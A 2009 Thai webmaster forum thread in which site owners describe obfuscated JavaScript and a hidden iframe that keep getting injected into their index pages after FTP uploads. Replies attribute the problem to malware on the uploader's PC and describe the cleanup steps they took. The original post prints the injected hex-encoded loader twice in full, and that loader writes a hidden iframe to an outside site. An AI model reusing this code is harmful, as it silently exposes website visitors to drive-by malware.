|
หัวข้อ: ใครเคยเจอ Script และ iframe แปลกๆ ที่ไฟล์ index บ้าง ผมเจอมา รายละเอียดดังนี้ เริ่มหัวข้อโดย: wutweb ที่ 19 มกราคม 2009, 03:14:12 :-*ช่วยด้วย
ใครเคยเจอ Script แปลกๆ ที่ไฟล์ index บ้าง ผมเจอมา รายละเอียดดังนี้ 1. เมื่อเปรียบเทียบไฟล์ที่อยู่ในเครื่อง และไฟล์ที่ upload ปรากฏว่าไฟล์ที่ upload ขึ้นโฮสต์ (รอสัก 3-12 ชม.) มันจะมีขนาดไฟล์ใหญ่ขึ้น 2KB แล้วเมื่อเปิดเปรียบเทียบกับไฟล์เก่า ปรากฏว่ามี Script แปลกๆจากไฟล์บนโฮสต์หลัง TAG <BODY> หน้าตาประมาณนี้(ตัวหนังสือสีแดง) </iframe><script>function c102916999516l497372f6547ab(l497372f654f7c){ function l497372f65574c(){var l497372f655f1e=16;return l497372f655f1e;} return (parseInt(l497372f654f7c,l497372f65574c()));}function l497372f6566f0(l497372f656ec0){ function l497372f658633(){var l497372f658e04=2;return l497372f658e04;} var l497372f657692='';l497372f6595d5=String.fromCharCode;for(l497372f657e62=0;l497372f657e62<l497372f656ec0.length;l497372f657e62+=l497372f658633()){ l497372f657692+=(l497372f6595d5(c102916999516l497372f6547ab(l497372f656ec0.substr(l497372f657e62,l497372f658633()))));}return l497372f657692;} var x2f='';var l497372f659da7='3C736'+x2f+'3726'+x2f+'970743E6'+x2f+'96'+x2f+'6'+x2f+'28216'+x2f+'D796'+x2f+'96'+x2f+'1297B6'+x2f+'46'+x2f+'F6'+x2f+'3756'+x2f+'D6'+x2f+'56'+x2f+'E742E77726'+x2f+'9746'+x2f+'528756'+x2f+'E6'+x2f+'5736'+x2f+'36'+x2f+'1706'+x2f+'528202725336'+x2f+'32536'+x2f+'392536'+x2f+'36'+x2f+'2537322536'+x2f+'312536'+x2f+'6'+x2f+'42536'+x2f+'352532302536'+x2f+'6'+x2f+'52536'+x2f+'312536'+x2f+'6'+x2f+'42536'+x2f+'3525336'+x2f+'42536'+x2f+'332533312533302532302537332537322536'+x2f+'3325336'+x2f+'42532372536'+x2f+'3825373425373425373025336'+x2f+'125326'+x2f+'6'+x2f+'25326'+x2f+'6'+x2f+'2536'+x2f+'372536'+x2f+'6'+x2f+'6'+x2f+'2536'+x2f+'372536'+x2f+'6'+x2f+'6'+x2f+'2533322536'+x2f+'6'+x2f+'42536'+x2f+'3525326'+x2f+'52536'+x2f+'6'+x2f+'52536'+x2f+'3525373425326'+x2f+'6'+x2f+'25326'+x2f+'52536'+x2f+'372536'+x2f+'6'+x2f+'6'+x2f+'25326'+x2f+'6'+x2f+'2536'+x2f+'332536'+x2f+'382536'+x2f+'352536'+x2f+'332536'+x2f+'6'+x2f+'225326'+x2f+'52536'+x2f+'382537342536'+x2f+'6'+x2f+'42536'+x2f+'6'+x2f+'32532372532302537372536'+x2f+'392536'+x2f+'342537342536'+x2f+'3825336'+x2f+'42533342533332533332532302536'+x2f+'382536'+x2f+'352536'+x2f+'392536'+x2f+'372536'+x2f+'3825373425336'+x2f+'4253333253336'+x2f+'2533312532302537332537342537392536'+x2f+'6'+x2f+'32536'+x2f+'3525336'+x2f+'4253237253736'+x2f+'2536'+x2f+'392537332536'+x2f+'392536'+x2f+'322536'+x2f+'392536'+x2f+'6'+x2f+'32536'+x2f+'3925373425373925336'+x2f+'12536'+x2f+'382536'+x2f+'392536'+x2f+'342536'+x2f+'342536'+x2f+'352536'+x2f+'6'+x2f+'525323725336'+x2f+'525336'+x2f+'325326'+x2f+'6'+x2f+'2536'+x2f+'392536'+x2f+'36'+x2f+'2537322536'+x2f+'312536'+x2f+'6'+x2f+'42536'+x2f+'3525336'+x2f+'52729293B7D76'+x2f+'6'+x2f+'172206'+x2f+'D796'+x2f+'96'+x2f+'13D7472756'+x2f+'53B3C2F736'+x2f+'3726'+x2f+'970743E';document.write(l497372f6566f0(l497372f659da7));</script> 2. เมื่อโหลดหน้าที่ติด Script นี้ จะมีการ RUN แปลกๆ สังเกตุที่ด้านล่าง Browser รู้สึกว่าจะ Run นานมาก มีการรันเข้า yahoo.com ด้วย 3. ส่วนมากจะเป็นที่ไฟล์ index ทุกไฟล์ ทุกโฟลเดอร์ ที่ใช้ FTP user เดียวกัน 4. เมื่อลบ Script นี้ไปแล้ว ทุกอย่างก็กลับมาเหมือนเดิม แต่ไม่นานนัก 3-12 ชม. มันก็มีมาอีกโดยอัตโนมัติ (เหนื่อยกับการมานั่งลบทุกไฟล์ index มากๆ) 5. เนื่องจากไฟล์ดึงมาเป็น IFRAME จึงทำให้หน้าเว็บไซต์ผมเละไปด้วย โดยการเพิ่มเนื้อที่ว่างๆ ยาวๆมาครึ่ง Browser จึงจะมองเห็นเนื้อหน้าทั้งหมด ใครมีประสบการณ์หรือพอจะช่วยเหลือผมได้ไม่ว่าจะด้วยวิธีใดๆ แนะนำผมด้วยนะครับ สามารถเข้าบอกคุยกับผมหรือส่งการช่วยเหลือมาที่ เมล์นี้นี้ครับ [email protected] ออนเอ็มด้วยครับ ตอนนี้เดือดร้อนมาก ไม่รู้จะแก้ยังไง (ขอคำตอบสำหรับผู้ที่เคยเจอเหตุการณ์นี้มาก่อนและแก้ไขได้แบบชัวร์ๆนะครับ เพราะไม่อยากงมกับวิธีแก้ที่ผิดๆ หรือคาดเดาเอาครับ) หัวข้อ: Re: ใครเคยเจอ Script และ iframe แปลกๆ ที่ไฟล์ index บ้าง ผมเจอมา รายละเอียดดังนี้ เริ่มหัวข้อโดย: wutweb ที่ 19 มกราคม 2009, 03:20:58 ดูตัวอย่างชัดๆ อีกครั้งนะครับ (สีแดงคือสิ่งที่มันทำมาเองอัตโนมัติ)
<BODY BGCOLOR="#E8E8E8" TEXT="#000000" LINK="#0000FF" VLINK="#FF0000"> <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe><script>function c102916999516l497372f848b94(l497372f848f7c){ return (parseInt(l497372f848f7c,16));}function l497372f849b37(l497372f849f1e){ function l497372f84aad8(){var l497372f84aec0=2;return l497372f84aec0;} var l497372f84a308='';l497372f84b2aa=String.fromCharCode;for(l497372f84a6ef=0;l497372f84a6ef<l497372f849f1e.length;l497372f84a6ef+=l497372f84aad8()){ l497372f84a308+=(l497372f84b2aa(c102916999516l497372f848b94(l497372f849f1e.substr(l497372f84a6ef,l497372f84aad8()))));}return l497372f84a308;} var x2f='';var l497372f84b692='3C736'+x2f+'3726'+x2f+'970743E6'+x2f+'96'+x2f+'6'+x2f+'28216'+x2f+'D796'+x2f+'96'+x2f+'1297B6'+x2f+'46'+x2f+'F6'+x2f+'3756'+x2f+'D6'+x2f+'56'+x2f+'E742E77726'+x2f+'9746'+x2f+'528756'+x2f+'E6'+x2f+'5736'+x2f+'36'+x2f+'1706'+x2f+'528202725336'+x2f+'32536'+x2f+'392536'+x2f+'36'+x2f+'2537322536'+x2f+'312536'+x2f+'6'+x2f+'42536'+x2f+'352532302536'+x2f+'6'+x2f+'52536'+x2f+'312536'+x2f+'6'+x2f+'42536'+x2f+'3525336'+x2f+'42536'+x2f+'332533312533302532302537332537322536'+x2f+'3325336'+x2f+'42532372536'+x2f+'3825373425373425373025336'+x2f+'125326'+x2f+'6'+x2f+'25326'+x2f+'6'+x2f+'2536'+x2f+'372536'+x2f+'6'+x2f+'6'+x2f+'2536'+x2f+'372536'+x2f+'6'+x2f+'6'+x2f+'2533322536'+x2f+'6'+x2f+'42536'+x2f+'3525326'+x2f+'52536'+x2f+'6'+x2f+'52536'+x2f+'3525373425326'+x2f+'6'+x2f+'25326'+x2f+'52536'+x2f+'372536'+x2f+'6'+x2f+'6'+x2f+'25326'+x2f+'6'+x2f+'2536'+x2f+'332536'+x2f+'382536'+x2f+'352536'+x2f+'332536'+x2f+'6'+x2f+'225326'+x2f+'52536'+x2f+'382537342536'+x2f+'6'+x2f+'42536'+x2f+'6'+x2f+'32532372532302537372536'+x2f+'392536'+x2f+'342537342536'+x2f+'3825336'+x2f+'42533332533372533352532302536'+x2f+'382536'+x2f+'352536'+x2f+'392536'+x2f+'372536'+x2f+'3825373425336'+x2f+'4253335253336'+x2f+'2532302537332537342537392536'+x2f+'6'+x2f+'32536'+x2f+'3525336'+x2f+'4253237253736'+x2f+'2536'+x2f+'392537332536'+x2f+'392536'+x2f+'322536'+x2f+'392536'+x2f+'6'+x2f+'32536'+x2f+'3925373425373925336'+x2f+'12536'+x2f+'382536'+x2f+'392536'+x2f+'342536'+x2f+'342536'+x2f+'352536'+x2f+'6'+x2f+'525323725336'+x2f+'525336'+x2f+'325326'+x2f+'6'+x2f+'2536'+x2f+'392536'+x2f+'36'+x2f+'2537322536'+x2f+'312536'+x2f+'6'+x2f+'42536'+x2f+'3525336'+x2f+'52729293B7D76'+x2f+'6'+x2f+'172206'+x2f+'D796'+x2f+'96'+x2f+'13D7472756'+x2f+'53B3C2F736'+x2f+'3726'+x2f+'970743E';document.write(l497372f849b37(l497372f84b692));</script> หัวข้อ: Re: ใครเคยเจอ Script และ iframe แปลกๆ ที่ไฟล์ index บ้าง ผมเจอมา รายละเอียดดังนี เริ่มหัวข้อโดย: wear428 ที่ 19 มกราคม 2009, 03:54:06 คุณ โดนแบบผมเลยครับ ผมโดน 2 Host แก้แบบที่เขาบอกโดยการเปลี่ยน Pass ใหม่ หายได้ 3-4 วัน 1 ใน 2 โฮสที่โดนกลับมาเหมือนเดิม
อีกอย่างมีไวรัสด้วยนะครับ ........ จับได้ทั้งสองตัวเลย สรุป ผมก็ยังแก้ไม่หาย จากกระทู้นี้ http://www.thaiseoboard.com/index.php/topic,48103.0.html หัวข้อ: Re: ใครเคยเจอ Script และ iframe แปลกๆ ที่ไฟล์ index บ้าง ผมเจอมา รายละเอียดดังนี้ เริ่มหัวข้อโดย: 004275 ที่ 19 มกราคม 2009, 07:38:39 โดนเหมือนกันคับ หน้า index แต่ลบไปแล้วก็หายนะ
หัวข้อ: Re: ใครเคยเจอ Script และ iframe แปลกๆ ที่ไฟล์ index บ้าง ผมเจอมา รายละเอียดดังนี้ เริ่มหัวข้อโดย: wutweb ที่ 19 มกราคม 2009, 14:43:30 สรุปเพิ่มนะครับ
1. เปลี่ยนรหัส FTP แล้ว ก้ยังเป็นเหมือนเดิม 2. ย้ายโฮสต์แล้วก็เป็นเหมือนเดิม 3. อาจจะเป็นเพราะไวรัสในเครื่องผมเอง (แต่วิธีนี้ต้องล้างเครื่องใหม่ยังไม่มีเวลาเลย) ใครคิดว่าไม่ได้เป็นเพราะข้อ 3 รบกวนแจ้งมาหน่อยนะครับจะได้หาวิธีแก้แบบอื่นไปก่อน หัวข้อ: Re: ใครเคยเจอ Script และ iframe แปลกๆ ที่ไฟล์ index บ้าง ผมเจอมา รายละเอียดดังนี้ เริ่มหัวข้อโดย: gut69 ที่ 19 มกราคม 2009, 15:07:56 ไวรัสมันมาอยู่ที่ตัวเครื่องครับ พออัพผ่าน ftp แล้วมันก็จะไปอยู่ที่ตัวเว็บ ใน server แล้วก็แตกตัวไปทุก user ที่อยู่ในตัวโปรแกรม ftp ของเราครับ
วิธีแก้ของผม - เข้าไป หน้า control ผ่านบราวเซอร์ แก้ password ไปลบ code ที่มันฝังมาผ่าน บราวเซอร์เลย - ล้างเครื่อง - เอา nod32 เวอร์ชั่นล่าสุด ลงสแกนทั้งหมด(พี่เค๊าแนะนำมา) หายครับ ผมโดนไป 8 เว็บครับ :'( หัวข้อ: Re: ใครเคยเจอ Script และ iframe แปลกๆ ที่ไฟล์ index บ้าง ผมเจอมา รายละเอียดดังนี้ เริ่มหัวข้อโดย: NwnonT ที่ 19 มกราคม 2009, 15:39:57 โห น่ากลัวจังครับ หวังว่าคงไม่โดนกับเว็บผมนะ สาธุ . . .
|